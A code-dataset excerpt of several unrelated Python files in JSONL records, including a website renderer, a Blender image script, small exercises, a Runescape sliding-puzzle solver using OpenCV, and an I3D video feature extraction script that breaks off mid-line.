suffix,\n option_checking=option_checking)\n ns.discover_objects()\n _namespaces[name] = ns\n\n return ns\n\ndef collect_subclasses(parent, suffix=None):\n \"\"\"Collect all subclasses of `parent` and return a dictionary where keys\n are object names. Obect name is decamelized class names transformed to\n identifiers and with `suffix` removed. If a class has class attribute\n `__identifier__` then the attribute is used as name.\"\"\"\n\n subclasses = {}\n for c in subclass_iterator(parent):\n if hasattr(c, \"__identifier__\"):\n name = getattr(c, \"__identifier__\")\n else:\n name = to_identifier(decamelize(c.__name__))\n\n if suffix and name.endswith(suffix):\n name = name[:-len(suffix)]\n subclasses[name] = c\n\n return subclasses\n\ndef subclass_iterator(cls, _seen=None):\n \"\"\"\n Generator over all subclasses of a given class, in depth first order.\n\n Source: http://code.activestate.com/recipes/576949-find-all-subclasses-of-a-given-class/\n \"\"\"\n\n if not isinstance(cls, type):\n raise TypeError('_subclass_iterator must be called with '\n 'new-style classes, not %.100r' % cls)\n\n _seen = _seen or set()\n\n try:\n subs = cls.__subclasses__()\n except TypeError: # fails only when cls is type\n subs = cls.__subclasses__(cls)\n for sub in subs:\n if sub not in _seen:\n _seen.add(sub)\n yield sub\n for sub in subclass_iterator(sub, _seen):\n yield sub\n\ndef _load_module(modulepath):\n mod = __import__(modulepath)\n path = []\n for token in modulepath.split(\".\")[1:]:\n path.append(token)\n mod = getattr(mod, token)\n return mod\n","sub_path":"cubes/extensions.py","file_name":"extensions.py","file_ext":"py","file_size_in_byte":5559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"627772817","text":"# Copyright (C) 2011 by Ondrej Martinak \n# \n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nimport markup\nfrom project import Project\n\nclass Renderer:\n\n\tdef __init__(self, _title, _css):\n\t\tself.title = _title\n\t\tself.css = _css\n\n\t\tself.page = markup.page()\n\n\t\tself.projects = []\n\n\t\tproj = Project(self.page, \"daffodil\")\n\t\tproj.setDescription(\"This little app will proceduraly generate a city. Future improvements should feature some interesting rendering techniques.\")\n\t\tproj.setDate(\"2011\")\n\t\tproj.setTech(\"python, Panda3D\")\n\t\tproj.setStatus(\"in progress\")\n\t\tproj.setSources({\"git\": \"https://github.com/omartinak/daffodil\"})\n\t\tself.projects.append(proj)\n\n\t\tproj = Project(self.page, \"pgpPainter\")\n\t\tproj.setDescription(\"This project presents a technique that renders a 3D object so it looks like a sketch. This sketch tries to emulate the sketch a human painter would draw, which means it has pronounced contours and a lighter shading is used along the contours rather than natural lighting. The technique works pretty well for static scenes but it is not very usable for the moving ones.\")\n\t\tproj.setDate(\"2009\")\n\t\tproj.setTech(\"C++, OpenSceneGraph, GLSL\")\n\t\tproj.setStatus(\"finished\")\n\t\tproj.setSources({\"zip\": \"pgpPainter_src.zip\"})\n\t\tproj.setExecutable({\"elf64\": \"pgpPainter_bin.zip\"})\n\t\tself.projects.append(proj)\n\n\t\tproj = Project(self.page, \"evo3D\")\n\t\tproj.setDescription(\"This application uses evolution algorithm to create spatial objects constructed from simple elements. User can control the evolution by evaluating the quality of certain candidates from the population while he can watch the population evolve in front of him. The evolved parameters are the object's growth and its change in color.\")\n\t\tproj.setDate(\"2009\")\n\t\tproj.setTech(\"java, Qt, OpenGL, genetic algorithms\")\n\t\tproj.setStatus(\"finished\")\n\t\tproj.setSources({\"zip\": \"evo3D_src.zip\"})\n\t\tproj.setExecutable({\"jar\": \"evo3D_bin.zip\"})\n\t\tself.projects.append(proj)\n\n\t\tproj = Project(self.page, \"g-wars\")\n\t\tproj.setDescription(\"g-wars was supposed to be another clone of a well known geometry wars game. It features a simple vector graphics that is post processed with a Cg shader to make it look a little bit fuzzy. It also features a 2D physics engine to make the objects' behaviour more realistic. The game was written with client-server architecture in mind but it was never finished.\")\n\t\tproj.setDate(\"2008\")\n\t\tproj.setTech(\"C++, SDL, OpenGL, nvidia Cg, Box2D\")\n\t\tproj.setStatus(\"unfinished\")\n\t\tproj.setSources({\"zip\": \"g-wars_src.zip\"})\n\t\tproj.setExecutable({\"elf64\": \"g-wars_bin.zip\"})\n\t\tself.projects.append(proj)\n\n\t\tproj = Project(self.page, \"Bankshot\")\n\t\tproj.setDescription(\"My first finished game as an amateur game developer working for SleepTeam Labs. I wrote the code, they supplied the rest. It is a pong variation with four players, either human or computer. Players are losing score whenever they don't catch the ball. To make the game more interesting players can shoot down various bonuses hanging in the center.\")\n\t\tproj.setDate(\"2004\")\n\t\tproj.setTech(\"C++, DirectX\")\n\t\tproj.setStatus(\"finished\")\n\t\tproj.setExecutable({\"link\": \"http://www.iwannaplay.com/?GameID=18\"})\n\t\tself.projects.append(proj)\n\n\t\tproj = Project(self.page, \"Ragnarok\")\n\t\tproj.setDescription(\"A would be clone of Baldur's Gate II with a flavour of Fallout :) with custom rules created by my friend. Although it was never finished it contains functional combat, inventory, character development and a fog of war. Conversation and trading systems were under development. I have also created a set of tools for preparing maps, creating inventory items and to help with animating sprites.\")\n\t\tproj.setDate(\"2002\")\n\t\tproj.setTech(\"C++, DirectX\")\n\t\tproj.setStatus(\"unfinished\")\n\t\tproj.setSources({\"zip\": \"ragnarok_src.zip\"})\n\t\tproj.setExecutable({\"win32\": \"ragnarok_bin.zip\"})\n\t\tself.projects.append(proj)\n\n\tdef header(self, text):\n\t\tself.page.div(class_ = 'header')\n\n\t\tself.page.h1(text, style = 'display: inline')\n\n\t\tself.page.span(class_ = 'small')\n\t\tself.page.a('me@bubaak.co.cc', href = \"mailto:me%40bubaak.co.cc\", class_ = 'contact')\n\t\tself.page.span.close()\n\n\t\tself.page.div.close()\n\n\tdef body(self):\n\t\tfor proj in self.projects:\n\t\t\tproj.render()\n\n\tdef render(self):\n\t\tself.page.add('')\n\t\tself.page.html(xmlns = \"http://www.w3.org/1999/xhtml\", lang = \"en\")\n\t\tself.page.head()\n\t\tself.page.meta(http_equiv = \"Content-Type\", content=\"text/html; charset=utf-8\")\n\t\tself.page.css(self.css)\n\t\tself.page.title(self.title)\n\t\tself.page.head.close()\n\t\tself.page.body()\n\n\t\tself.page.div(class_ = 'mainContent')\n\n\t\tself.header(\"Ondrej Martinak's web\")\n\t\tself.body()\n\n\t\tself.page.div(class_ = 'glider')\n\t\tself.page.a(class_ = 'anchorImg', href = \"http://www.catb.org/hacker-emblem/\")\n\t\tself.page.img(style = 'border: none', src = \"data/img/glider.png\", alt = \"hacker emblem\")\n\t\tself.page.a.close()\n\t\tself.page.div.close()\n\n\t\tself.page.div.close()\n\n\t\tself.page.body.close()\n\t\tself.page.html.close()\n\n\t\tprint(self.page)\n\n","sub_path":"generator/renderer.py","file_name":"renderer.py","file_ext":"py","file_size_in_byte":6125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"411819885","text":"import bpy\nimport os\n\n\ndef ls(cdir): # return directory contents of cdir\n ls = os.listdir(cdir)\n return ls\n\n\nsc = bpy.data.scenes[0] # get current scene\nimgdir = \"C:\\\\images\"\nimg_ext = 'jpg'\n\nfiles = [] # list for files\nimages = [] # list for imgage files\nfiles = (ls(imgdir)) # read file list into list\nfile_count = len(files) # file count\n\nfor a in range(0, file_count): # for each file:\n if files[a].endswith(img_ext): # does it end with?\n images.append(files[a]) # if so then add to images list\n\nimage_count = len(images) # count of images\nprint(file_count)\nprint(image_count)\n\nfor a in range(0, image_count): # for each image\n print(\"========================\")\n print('loop count: ' + str(a))\n bpy.ops.mesh.primitive_plane_add()\n plane = bpy.context.scene.objects.active\n\n mat = bpy.data.materials.new('mat' + str(a))\n bpy.context.object.data.materials.append(mat)\n\n tex = bpy.data.textures.new('ColorTex', type='IMAGE')\n imgpath = imgdir + '\\\\' + images[a] # make string with path ti image\n img = bpy.data.images.load(imgpath) # load image\n tex.image = img\n mtex = mat.texture_slots.add()\n mtex.texture = tex\n\n imgX = img.size[0] / 1000.0 # calculate dimensions\n imgY = img.size[1] / 1000.0\n\n plane.scale[0] = (imgX) # set x plane dimensions to match image\n plane.scale[1] = (imgY) # set y plane dimensions to match image\n","sub_path":"learning data/uv_maker.py","file_name":"uv_maker.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"279218906","text":"n = int(input(\"Type a number between 1 and 100 inclusive: \"))\nif 1 <= n <= 100:\n print(\"Well done!\" + \" The number \" + str(n) + \" satisfies the condition.\")\nelse:\n while (1 <= n <= 100) != True:\n print(\"Error!\")\n n = int(input(\"Type a number between 1 and 100: \"))\n else:\n print (\"Thank goodness! I was running out of memory here!\")\n \n \n","sub_path":"Practise/num.py","file_name":"num.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"156869556","text":"\n# coding: utf-8\n\n# In[38]:\n\n\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport nltk\n\nfrom datetime import datetime\n\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem import SnowballStemmer\n\n# sklearn\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.decomposition import NMF\n\n\n# In[39]:\n\n\ndef custom_tokenizer(text):\n full_punc = '’‘“”.–…�🇺🇸★➠' + string.punctuation\n # remove punctuation\n remove_punct = str.maketrans('', '', full_punc)\n text = text.translate(remove_punct)\n\n # remove digits and convert to lower case\n remove_digits = str.maketrans('', '', string.digits)\n text = text.lower().translate(remove_digits)\n\n # tokenize\n tokens = word_tokenize(text)\n\n # remove stop words\n punc = [str(i) for i in string.punctuation]\n cust_stop_words = (['rt', 'retweet', 'get', 'one', 'im', 'thing', 'get', 'dont', 'wow',\n 'lol', 'amp', 'n', 'didnt', 'people', 'like', 'want', 'know', 'go',\n 'think', 'need', 'right', 'good', 'would', 'going', 'never', 'see',\n 'time', 'call', 'said', 'got', 'us', 'p', 'look', 'mr'])\n stop_words = cust_stop_words + stopwords.words('english')\n tokens_stop = [y for y in tokens if y not in stop_words]\n\n # stem\n# stemmer = SnowballStemmer('english')\n# tokens_stem = [stemmer.stem(y) for y in tokens_stop] \n\n return tokens_stop\n\n\n# In[40]:\n\n\nwith open(\"rtrolls_df.pkl\", 'rb') as picklefile:\n df_rtrolls = pickle.load(picklefile) \n \nimport json\nwith open('topics2words.json', 'r') as fp:\n topic_dict = json.load(fp)\n\n\n# In[41]:\n\n\ndf_rtrolls.head()\n\n\n# In[42]:\n\n\n#group by week\ntemp_df = df_rtrolls.groupby([\"week\", \"topicnumber\"]).count().reset_index()\n# temp_df\n\ntopic_weeks_df = temp_df[['week', 'topicnumber', 'content']]\n# topic_weeks_df\n\n\n# In[43]:\n\n\ntemp_df = topic_weeks_df[((topic_weeks_df['topicnumber'] == 0) |\n (topic_weeks_df['topicnumber'] == 15) |\n (topic_weeks_df['topicnumber'] == 2) | \n (topic_weeks_df['topicnumber'] == 4) |\n (topic_weeks_df['topicnumber'] == 19) |\n (topic_weeks_df['topicnumber'] == 11) | \n (topic_weeks_df['topicnumber'] == 16) | \n (topic_weeks_df['topicnumber'] == 7) |\n (topic_weeks_df['topicnumber'] == 5) | \n (topic_weeks_df['topicnumber'] == 13))]\n\n\n# In[44]:\n\n\ndata_fillna = temp_df.pivot_table('content', 'week', 'topicnumber').fillna(0).unstack().reset_index()\n\n\n# In[45]:\n\n\ndata_fillna.head()\n\n\n# In[46]:\n\n\n#we lose the count label column in the previous steps, so we're just renaming it here, and reordering columns based on \n#how they are arranged in the viz csv\ndata_fillna.columns = [\"topicnumber\", \"week\", \"content\"]\ndata_fillna = data_fillna[[\"week\", \"topicnumber\", \"content\"]]\ndata_fillna.head()\n\n\n# In[47]:\n\n\ndata_fillna.sort_values('week', inplace=True)\n\n\n# In[48]:\n\n\n#backup file\ndata_fillna.to_csv(\"topicsbyweek.csv\", index = False)\n\n","sub_path":"nlp_russian_tweets/AWS Code/topic_dates.py","file_name":"topic_dates.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"498218633","text":"from collections import Counter\nclass Solution:\n def intersect(self, nums1: List[int], nums2: List[int]) -> List[int]:\n counter_1 = Counter(nums1)\n counter_2 = Counter(nums2)\n \n intersection = []\n for element in counter_1:\n if element in counter_2:\n intersection+=[element]*min(counter_1[element],counter_2[element])\n \n return intersection\n","sub_path":"programcreek/top-10-algorithms/intersection-of-two-arrays-ii.py","file_name":"intersection-of-two-arrays-ii.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"62577042","text":"import sys\nimport kNN\nfrom pylab import *\nfrom numpy import *\nimport numpy as np\nimport matplotlib\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nmat,lab = kNN.file2matrix('datingTestSet2.txt')\nnormMat, ranges, minVals = kNN.autoNorm(mat)\n\ndef randrange(n, vmin, vmax):\n return (vmax - vmin)*np.random.rand(n) + vmin\n\nfig = plt.figure()\nax = fig.add_subplot(111,projection='3d')\n#ax.scatter(normMat[:,0], normMat[:,1], normMat[:,2], 'o', 'c')\nn = 1\nfor c, m, zl, zh in [('r', 'o', -50, -25), ('b', '^', -30, -5)]:\n xs = randrange(n, 23, 32)\n ys = randrange(n, 0, 100)\n zs = randrange(n, zl, zh)\n\nClassSet=lab\ncolorSet = []\nfor label in ClassSet:\n\tif label is '1':\n\t\tcolorSet.append('r')\n\telif label is '2':\n\t\tcolorSet.append('b')\n\telif label is '3':\n\t\tcolorSet.append('y')\n\telse:\n\t\tcolorSet.append('r')\nprint(colorSet)\n\nx=normMat[:,0]\ny=normMat[:,1]\nz=normMat[:,2]\ni=0\nfor lx in x:\n\tly = y[i]\n\tlz = z[i]\n\tlc = colorSet[i]\n\ti=i+1\n\tprint(lx,ly,lz,lc)\n\tax.scatter(lx, ly, lz, c=lc, marker='o')\n#ax.scatter(normMat[:,0], normMat[:,1], normMat[:,2], colorSet, marker='o')\n\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Z')\nplt.show()\n","sub_path":"machinelearninginaction/Ch02/tu3.py","file_name":"tu3.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"85151917","text":"l=['ee','ii','oo','aa','uu','yy']\r\nn=int(input())\r\ndef co(h):\r\n cc=0\r\n for i in l:\r\n cc+=h.count(i)\r\n return cc\r\nd={}\r\nwhile(n!=0):\r\n for i in range(n):\r\n b=input()\r\n d[b]=co(b)\r\n kk=list(d.values())\r\n ll=list(d.keys())\r\n print(ll[kk.index(max(kk))])\r\n d={}\r\n n=int(input())\r\n","sub_path":"beekeeper.py","file_name":"beekeeper.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"539470332","text":"class Solution:\n def isPalindrome(self, x: int) -> bool:\n x1 = str(x)\n x2 = \"\"\n for i in range(len(x1)-1,-1,-1):\n x2 = x2+x1[i]\n if x1 == x2:\n return True\n return False\n ","sub_path":"LeetCode/9.Palindrome-Number.py","file_name":"9.Palindrome-Number.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"619883470","text":"from cv2 import (matchTemplate, cvtColor, Canny, minMaxLoc, TM_CCORR_NORMED, COLOR_BGR2GRAY, resize, imshow, waitKey)\nfrom numpy import (linspace, median)\nfrom threading import Thread\nimport npuzzlesolver as npuzzle\nimport templates\nimport main as puzzle\n\n\nclass PuzzleBox:\n def __init__(self, runescapeimage):\n self.PUZZLE_DIM = {'width': 210, 'height': 208} # Default dimensions of the Runescape puzzle box\n self.runescapeimage = runescapeimage\n (self.puzzleimage, self.puzzlerect) = (None, None)\n th = Thread(target=self.findpuzzlebox)\n th.daemon = True\n th.start()\n self.scalex = None\n self.scaley = None\n\n def setscales(self):\n self.scalex = self.puzzlerect['width'] / self.PUZZLE_DIM['width']\n self.scaley = self.puzzlerect['height'] / self.PUZZLE_DIM['height'] # Scaled dimensions\n\n def findpuzzlebox(self):\n found = self.findedgetemplate(self.runescapeimage, templates.PUZZLE_BOX_TEMPLATE)\n (_, unscaledlocation, scale) = found\n (puzzle_posx, puzzle_posy) = ((unscaledlocation[0] * scale), (unscaledlocation[1] * scale))\n (puzzle_endx, puzzle_endy) = (((unscaledlocation[0] + self.PUZZLE_DIM['width']) * scale),\n ((unscaledlocation[1] + self.PUZZLE_DIM['height']) * scale)) # Scaled position\n\n rect = {'posx': puzzle_posx, 'posy': puzzle_posy,\n 'width': puzzle_endx - puzzle_posx, 'height': puzzle_endy - puzzle_posy}\n maskedimage = self.maskimage(self.runescapeimage, rect) # black out part of screenshot we don't need\n self.puzzleimage = maskedimage\n self.puzzlerect = rect\n self.setscales()\n puzzle.PuzzleThread.puzzlebox_ready = True\n\n def findedgetemplate(self, image, template):\n found = None\n gray = cvtColor(image, COLOR_BGR2GRAY)\n template = self.auto_canny(template)\n (template_height, template_width) = template.shape[:2]\n # loop over the scales of the image\n for scale in linspace(0.2, 1.0, 100)[::-1]:\n # resize the image according to the scale, and keep track\n # of the ratio of the resizing\n resized = resize(gray, (0, 0), fx=scale, fy=scale)\n r = gray.shape[1] / float(resized.shape[1])\n\n # if the resized image is smaller than the template, then break\n # from the loop\n if resized.shape[0] < template_height or resized.shape[1] < template_width:\n break\n edged = self.auto_canny(resized)\n result = matchTemplate(edged, template, TM_CCORR_NORMED)\n (_, maxval, _, maxloc) = minMaxLoc(result)\n\n # if we have found a new maximum correlation value, then update\n # the bookkeeping variable\n if found is None or maxval > found[0]:\n found = (maxval, maxloc, r)\n if maxval > 0.6:\n break\n\n return found\n\n @staticmethod\n def maskimage(unmasked, puzzlerect):\n mask = unmasked[puzzlerect['posy']:puzzlerect['posy'] + puzzlerect['height'],\n puzzlerect['posx']:puzzlerect['posx'] + puzzlerect['width']]\n return mask\n\n @staticmethod\n def auto_canny(image, sigma=0.33):\n # compute the median of the single channel pixel intensities\n v = median(image)\n\n # apply automatic Canny edge detection using the computed median\n lower = int(max(0, (1.0 - sigma) * v))\n upper = int(min(255, (1.0 + sigma) * v))\n edged = Canny(image, lower, upper)\n\n # return the edged image\n return edged\n\n\nclass PuzzleTiles:\n def __init__(self, puzzlebox):\n self.TILE_ATTRS = {'FIRST_POSX': 16, 'FIRST_POSY': 14, 'TILE_WIDTH': 29, 'TILE_HEIGHT': 29,\n 'TILE_GAP': 8} # Default positional values of tiles\n self.first_posx_scaled = self.TILE_ATTRS['FIRST_POSX'] * puzzlebox.scalex\n self.first_posy_scaled = self.TILE_ATTRS['FIRST_POSY'] * puzzlebox.scaley\n self.tile_width_scaled = self.TILE_ATTRS['TILE_WIDTH'] * puzzlebox.scalex\n self.tile_height_scaled = self.TILE_ATTRS['TILE_HEIGHT'] * puzzlebox.scaley\n self.tile_gaphorz_scaled = self.TILE_ATTRS['TILE_GAP'] * puzzlebox.scalex\n self.tile_gapvert_scaled = self.TILE_ATTRS['TILE_GAP'] * puzzlebox.scaley\n self.movecount = 0\n self.moves = []\n self.tileresults = []\n\n self.puzzlebox = puzzlebox\n self.tilepositions = self.gettilepositions()\n self.template_images = templates.PUZZLE_PIECES[puzzle.overlay.selectedPuzzle]\n\n def gettilepositions(self):\n positions = []\n for y in range(0, 5):\n pointy = self.first_posy_scaled + (self.tile_height_scaled * y) + (y * self.tile_gapvert_scaled)\n for x in range(0, 5):\n pointx = self.first_posx_scaled + (self.tile_width_scaled * x) + (x * self.tile_gaphorz_scaled)\n positions.append([pointx, pointy])\n return positions\n\n def gettileimages(self, puzzlebox):\n tileimages = []\n for position in self.tilepositions:\n tileimage = puzzlebox.puzzleimage[position[1]:position[1] + self.tile_width_scaled,\n position[0]:position[0] + self.tile_height_scaled]\n tileimages.append(tileimage)\n return tileimages\n\n @staticmethod\n def get_key(item):\n return item[0]\n\n def match_tiles(self):\n results = [-1 for _ in range(25)]\n likeliness = [-1 for _ in range(25)]\n correlation_values = [[] for _ in range(25)]\n tile_images = self.gettileimages(self.puzzlebox)\n for x, tile in enumerate(tile_images):\n for i, template_tile in enumerate(self.template_images):\n resized_template = resize(template_tile, (tile.shape[1], tile.shape[0]))\n result = matchTemplate(tile, resized_template, TM_CCORR_NORMED)\n (_, maxval, _, maxloc) = minMaxLoc(result)\n correlation_values[x].append([maxval, i])\n correlation_values[x].sort(key=self.get_key, reverse=True)\n results[x] = correlation_values[x][0][1]\n likeliness[x] = correlation_values[x][0][0]\n return results, likeliness, correlation_values\n\n def findzerotile(self):\n correlation_values = []\n tile_images = self.gettileimages(self.puzzlebox)\n for x, tile in enumerate(tile_images):\n resized_template = resize(self.template_images[0], (tile.shape[1], tile.shape[0]))\n result = matchTemplate(tile, resized_template, TM_CCORR_NORMED)\n (_, maxval, _, maxloc) = minMaxLoc(result)\n correlation_values.append([maxval, x])\n correlation_values.sort(key=self.get_key, reverse=True)\n return correlation_values[0][1]\n\n @staticmethod\n def rematch_tiles(shiftcorr, shiftamounts, correlation_values):\n results = [-1 for _ in range(25)]\n likeliness = [-1 for _ in range(25)]\n for item in shiftcorr:\n results[item[0]] = correlation_values[item[0]][shiftamounts[item[0]]][1]\n likeliness[item[0]] = correlation_values[item[0]][shiftamounts[item[0]]][0]\n return results, likeliness\n\n @staticmethod\n def find_rechecks(checkarray, correlation_values):\n duplicates = [[i, item] for i, item in enumerate(checkarray) if checkarray.count(item) > 1]\n for x, item in enumerate(duplicates):\n bettermatch = item\n for y, secitem in enumerate(duplicates):\n if item == secitem:\n if correlation_values[y] > correlation_values[x]:\n bettermatch = secitem\n duplicates.remove(bettermatch)\n return duplicates\n\n def gettileresults(self):\n recheck_count = [0 for _ in range(25)]\n results, likeliness, correlation_values = self.match_tiles()\n rechecks = self.find_rechecks(results, likeliness)\n loopcount = 0\n while len(rechecks) > 0:\n loopcount += 1\n if loopcount >= 400: # never going to solve\n break\n for item in rechecks:\n recheck_count[item[0]] += 1\n if recheck_count[item[0]] >= 25:\n recheck_count[item[0]] = 0\n\n newresults, newlikeliness = self.rematch_tiles(rechecks, recheck_count, correlation_values)\n for x, item in enumerate(newresults):\n if item is not -1:\n results[x] = newresults[x]\n likeliness[x] = likeliness[x]\n rechecks = self.find_rechecks(results, likeliness)\n return results\n\n def createmovelist(self):\n t = self.gettileresults()\n self.moves, self.tileresults = npuzzle.main(t)\n self.movecount = len(self.moves)\n\n def getmovelocation(self, steps):\n if len(self.moves) == 0:\n self.createmovelist()\n self.updatemoves()\n tilepositions = []\n for step in steps:\n if self.movecount >= step + 1:\n x = self.tileresults.index(self.moves[step]) % 5\n y = int((self.tileresults.index(self.moves[step]) / 5))\n tilepos = [self.first_posx_scaled + (self.tile_width_scaled * x) + (x * self.tile_gaphorz_scaled) +\n self.puzzlebox.puzzlerect['posx'],\n self.first_posy_scaled + (self.tile_height_scaled * y) + (y * self.tile_gapvert_scaled) +\n self.puzzlebox.puzzlerect['posy']-6]\n tilepositions.append(tilepos)\n else:\n tilepositions.append(None)\n return tilepositions\n\n def updatemoves(self):\n zerotile = self.findzerotile()\n if self.tileresults.index(0) is not zerotile:\n if zerotile in self.getadjacent(self.tileresults.index(0)):\n self.tileresults[self.tileresults.index(0)] = self.tileresults[zerotile]\n self.tileresults[zerotile] = 0\n t = self.tileresults\n self.moves, self.tileresults = npuzzle.main(t)\n self.movecount = len(self.moves)\n\n @staticmethod\n def getadjacent(index):\n if index >= 5: # up\n yield index - 5\n if index % 5 > 0: # right\n yield index - 1\n if index % 5 is not 4: # left\n yield index + 1\n if index < 20: # down\n yield index + 5\n yield index\n","sub_path":"puzzle.py","file_name":"puzzle.py","file_ext":"py","file_size_in_byte":10556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"223687265","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport tensorflow as tf\nimport sonnet as snt\n\nfrom PIL import Image, ImageOps\nimport cv2\n\nimport numpy as np\n\nimport os\n\nimport i3d\n\nimport sys\n\ninp1 = sys.argv[1]\ninp2 = sys.argv[2]\n\n# In[2]:\n\n\n# Proprecessing for image(scale and crop)\ndef reshape_img_pil(img):\n width, height = np.array(img).shape[0:2]\n min_ = min(height, width)\n ratio = float(256/float(min_))\n new_w = int(ratio*width)\n new_h = int(ratio*height)\n \n img_resize = np.array(img.resize((new_w, new_h), resample=Image.BILINEAR))\n img_scale = (img_resize/255.0)*2-1\n new_img = img_scale[int((new_h-224)/2):int((new_h+224)/2),int((new_w-224)/2):int((new_w+224)/2),:]\n \n return new_img\n\ndef reshape_cv2(img, type):\n width, height = img.shape[0:2]\n min_ = min(height, width)\n ratio = float(256/float(min_))\n new_w = int(ratio*width)\n new_h = int(ratio*height)\n# print(width, height, new_w, new_h)\n# print((new_h-224)/2, (new_h+224)/2, (new_w-224)/2, (new_w+224)/2)\n if type=='rgb':\n frame = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n else:\n frame = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n frame = cv2.resize(frame, (new_w,new_h), interpolation=cv2.INTER_LINEAR)\n frame = (frame/255.0)*2-1\n frame = frame[int((new_h-224)/2):int((new_h+224)/2),int((new_w-224)/2):int((new_w+224)/2)]\n \n return frame\n\n\n# In[3]:\n\n\ndef get_batch(idx, step, video_path, video_name, type):\n raw_images = []\n for i in range(step):\n if type == 'rgb':\n image_name = 'img_%05d.jpg'%(idx+1+i)\n if os.path.exists(os.path.join(video_path, image_name)):\n img = cv2.imread(os.path.join(video_path, image_name))\n img = reshape_cv2(img, type='rgb')\n raw_images.append(img)\n elif type == 'flow':\n flow_x_name = 'flow_x_%05d.jpg'%(idx+1+i)\n flow_y_name = 'flow_y_%05d.jpg'%(idx+1+i)\n if os.path.exists(os.path.join(video_path, flow_x_name)):\n flow_x_img = cv2.imread(os.path.join(video_path, flow_x_name))\n flow_y_img = cv2.imread(os.path.join(video_path, flow_y_name))\n \n flow_x_img = reshape_cv2(flow_x_img, type='flow')\n flow_y_img = reshape_cv2(flow_y_img, type='flow')\n \n# print(flow_x_img.shape, flow_y_img.shape)\n# flow = np.stack((flow_x_img, flow_y_img))\n# print(flow.shape)\n flow = np.stack((flow_x_img, flow_y_img)).reshape(224,224,2)\n\n raw_images.append(flow)\n \n return np.array(raw_images)\n\n\n# In[13]:\n\n\nimage_size = 224\nnum_class = 20\n\nsample_path = {\n 'rgb': 'data/v_CricketShot_g04_c01_rgb.npy',\n 'flow': 'data/v_CricketShot_g04_c01_flow.npy',\n}\n\ncheckpoints = {\n 'rgb_scratch': 'data/checkpoints/rgb_scratch/model.ckpt',\n 'flow_scratch': 'data/checkpoints/flow_scratch/model.ckpt',\n 'rgb_imagenet': 'data/checkpoints/rgb_imagenet/model.ckpt',\n 'flow_imagenet': 'data/checkpoints/flow_imagenet/model.ckpt',\n}\n\nraw_path = {\n 'val': '/data/th14_raw/val_optical_flow_rgb',\n 'test': '/data/th14_raw/test_optical_flow_rgb',\n}\n\nsave_paths = {\n 'val_imagenet': '/data/th14_feature_i3d/feat_and_var/feat_imagenet/val_feat',\n 'test_imagenet': '/data/th14_feature_i3d/feat_and_var/feat_imagenet/test_feat',\n 'val_scratch': '/data/th14_feature_i3d/feat_and_var/feat_scratch/val_feat',\n 'test_scratch': '/data/th14_feature_i3d/feat_and_var/feat_scratch/test_feat',\n}\n\n\n# In[4]:\n\n\nrgb_input = tf.placeholder(tf.float32, shape=(1,None,image_size,image_size,3))\nflow_input = tf.placeholder(tf.float32, shape=(1,None,image_size,image_size,2))\nwith tf.variable_scope('RGB'):\n rgb_model = i3d.InceptionI3d(num_class+1, spatial_squeeze=True, final_endpoint='Mixed_5c')\n rgb_mixed5c, _ = rgb_model(rgb_input, is_training=False, dropout_keep_prob=1.0)\n# rgb_feat = tf.nn.avg_pool3d(rgb_mixed5c, ksize=[1, 2, 7, 7, 1],\n# strides=[1, 1, 1, 1, 1], padding=snt.VALID)\n rgb_feat = rgb_mixed5c\n\nrgb_variable_map = {}\nfor variable in tf.global_variables():\n if variable.name.split('/')[0] == 'RGB':\n rgb_variable_map[variable.name.replace(':0', '')] = variable\nrgb_saver = tf.train.Saver(var_list=rgb_variable_map, reshape=True)\n \nwith tf.variable_scope('Flow'):\n flow_model = i3d.InceptionI3d(num_class+1,spatial_squeeze=True, final_endpoint='Mixed_5c')\n flow_mixed5c, _ = flow_model(flow_input, is_training=False, dropout_keep_prob=1.0)\n# flow_feat = 